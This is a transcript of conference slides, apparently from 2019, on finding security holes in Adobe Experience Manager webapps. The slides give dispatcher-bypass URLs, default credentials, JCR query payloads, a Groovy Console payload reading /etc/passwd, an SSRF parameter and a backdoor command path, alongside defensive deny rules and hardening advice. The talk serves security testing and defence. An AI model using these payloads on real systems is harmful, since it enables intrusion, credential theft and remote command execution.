Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Securing AEM webapps by hacking them

Securing AEM webapps by hacking them

Mikhail Egorov

September 03, 2019
Tweet

More Decks by Mikhail Egorov

Other Decks in Programming

Transcript

  1. APACHE SLING & FRIENDS TECH MEETUP
    2 - 4 SEPTEMBER 2019
    Securing AEM webapps by hacking them
    Mikhail Egorov @0ang3el, Security researcher & Bug hunter.

    View Slide

  2. 2
    Intro

    View Slide

  3. whoami
    3
     Security researcher & full-time bug hunter
     https://bugcrowd.com/0ang3el
     https://hackerone.com/0ang3el
     Conference speaker
     https://www.slideshare.net/0ang3el
     https://speakerdeck.com/0ang3el

    View Slide

  4. AEM & Bug Bounties
    4

    View Slide

  5. My research on AEM security
    5
    PHDays 2015
    Hacktivity 2018
    LevelUp 2019
    https://www.slideshare.net/0ang3el

    View Slide

  6. Fellow hackers
    6
    @darkarnium, 2016
    @fransrosen, 2018
    @JonathanBoumanium, 2018
    https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c
    https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem
    http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

    View Slide

  7. Common AEM deployment
    7
    Interacts with Publish server
    via AEM Dispatcher!
    4503/tcp
    4502/tcp
    443/tcp
    ?
    Main blocks:
    • Author AEM instance
    • Publish AEM instance
    • AEM dispatcher (~WAF)

    View Slide

  8. Sources of vulnerabilities
    8
     AEM misconfiguration
     AEM code (CVEs)
     3rd-party plugins
     Your code

    View Slide

  9. 9
    Vulnerabilities due to misconfiguration

    View Slide

  10. AEM dispatcher bypass – CVE-2016-0957
    10
     Blocked by Dispatcher
     /bin/querybuilder.json
     However passed to publish instance
     /bin/querybuilder.json/a.css
     /bin/querybuilder.json/a.icoS
     /bin/querybuilder.json?a.html
     /bin/querybuilder.json;%0aa.css

    View Slide

  11. AEM dispatcher bypass – Sling “features”
    11
     When Sling Servlet is registered with
    sling.servlet.path other properties are
    ignored (e.g. sling.servlet.extensions)
     Bypassing extension check
     /bin/querybuilder.json.css
     /bin/querybuilder.feed.ico

    View Slide

  12. AEM dispatcher bypass – Sling “features”
    12
     When Sling Servlet is registered with
    sling.servlet.resourceTypes
     Bypassing path check
     Create node with proper sling:resourceType under
    /content/usergenerated/etc/commerce/smartlists

    View Slide

  13. AEM dispatcher security tips
    13
     Don’t use rules like
     /0041 { /type "allow" /url "*.css" } # This is bad
     Better use
     /0041 { /type "allow" /extension 'css' }

    View Slide

  14. AEM dispatcher security tips
    14
     Explicit deny rule for dangerous endpoints
     /0090 { /type "deny" /path "/libs/*" }
     /0091 { /type "deny" /path "/bin/querybuilder*" }
     Place explicit deny rules in the end of policy

    View Slide

  15. Default credentials
    15
     admin/admin
     author/author
     Geometrixx users
     grios:password
    [email protected]:jdoe
     …

    View Slide

  16. Default credentials
    16
    == base64(admin:admin)

    View Slide

  17. Weak passwords / Credentials bruterorcing
    17
     Properties jcr:createdBy, cq:lastModifiedBy,
    jcr:lastModifiedBy contain usernames
     Many ways to bruteforce
     LoginStatusServlet
     GetLoggedInUser servlet
     CurrentUserServlet
     …

    View Slide

  18. Weak permissions for JCR
    18
     Many ways to access JCR
     DefaultGetServlet
     QueryBuilderJsonServlet
     QueryBuilderFeedServlet
     GQLSearchServlet
     CRXDE Lite
     …

    View Slide

  19. Weak permissions for JCR
    19
     Anonymous user has jcr:write permission
    for /content/usergenerated/etc/commerce/s
    martlists

    View Slide

  20. 0
    /apps//config.author.tidy.1..json/a.ico

    View Slide

  21. Weak permissions for JCR
    21
    type=nt:file&nodename=*.zip

    View Slide

  22. Weak permissions for JCR
    22
    path=/home&p.hits=full&p.limit=-1

    View Slide

  23. 23
    Vulnerabilities due to 3-rd party components

    View Slide

  24. Groovy Console
    24
     Exposes servlet at
    /bin/groovyconsole/post.servlet without
    authentication
    by default
    https://github.com/icfnext/aem-groovy-console

    View Slide

  25. cS4VLFuCHKwX;XS
    script=def+proc+%3d+”cat+/etc/passwd”.execute()%0d%0aprintln+proc.text

    View Slide

  26. ACS AEM Tools
    26
     Exposes Fiddle with ability to execute JSP
    scripts on /etc/acs-tools/aem-
    fiddle/_jcr_content.run.html
     May not require authentication

    View Slide

  27. cS4VLFuCHKwX;X

    View Slide

  28. 28
    AEM vulnerabilities

    View Slide

  29. CVE-2018-12809 (SSRF*)
    29
     ReportingServicesProxyServlet (cq-content-insight bundle)
    @SlingServlet(
    generateComponent = true,
    metatype = true,
    resourceTypes = {"cq/contentinsight/proxy"},
    extensions = {"json"},
    selectors = {"reportingservices"},
    methods = {"GET"},
    label = "Reporting Services API proxy servlet",
    description = "Proxy servlet for Reporting Services API"
    )
    public class ReportingServicesProxyServlet extends SlingSafeMethodsServlet {
    private static final String DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*";}

    } *SSRF - Server Side Request Forgery

    View Slide

  30. CVE-2018-12809 (SSRF*)
    30
     Paths to invoke servlet
     /libs/cq/contentinsight/content/proxy.reportingservices.json
     /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet
     Vulnerable parameter url
     url=http://anyurl%23/api1.omniture.com/a
    *SSRF - Server Side Request Forgery

    View Slide

  31. View Slide

  32. View Slide

  33. View Slide

  34. ExternalJobPostServlet deser / CVE?
    34
     Affects AEM 5.5 / AEM 5.6
    @Service
    @Properties(value = {
    @Property(name = "sling.servlet.extensions", value = "json"),
    @Property(name = "sling.servlet.paths", value =
    "/libs/dam/cloud/proxy"),
    @Property(name = "sling.servlet.methods", value = { "POST", "GET",
    "HEAD" })
    })
    public class ExternalJobPostServlet extends SlingAllMethodsServlet {
    ...
    }

    View Slide

  35. ExternalJobPostServlet deser / CVE?
    35
     Parameter file accepts Java serialized stream
    and passes to OIS.readObject()
     Hard to exploit in OSGI environment

    View Slide

  36. View Slide

  37. View Slide

  38. 38
    Automation

    View Slide

  39. AEM RCE bundle
    39
     Allows to get RCE* when having access to
    Felix Console
     https://github.com/0ang3el/aem-rce-bundle.git
    * RCE – Remote Code Execution

    View Slide

  40. AEM RCE bundle
    40
     Path - /bin/backdoor.html?cmd=ifconfig

    View Slide

  41. AEM Hacker
    41
     Scripts to check security of AEM application
     aem_hacker.py, aem_discoverer.py, aem_enum.py,
    aem_ssrf2rce.py, aem_server.py, response.bin,
    aem-rce-sling-script.sh
     https://github.com/0ang3el/aem-hacker.git

    View Slide

  42. DEMO
    42

    View Slide

  43. 43
    Takeaways

    View Slide

  44. Takeaways
    44
     Vulnerabilities can occur on different levels
     Install security updates
     Defense in depth
     Check security of AEM application
     Pentest / Bug bounty

    View Slide

  45. 45
    Thank you
    @0ang3el

    View Slide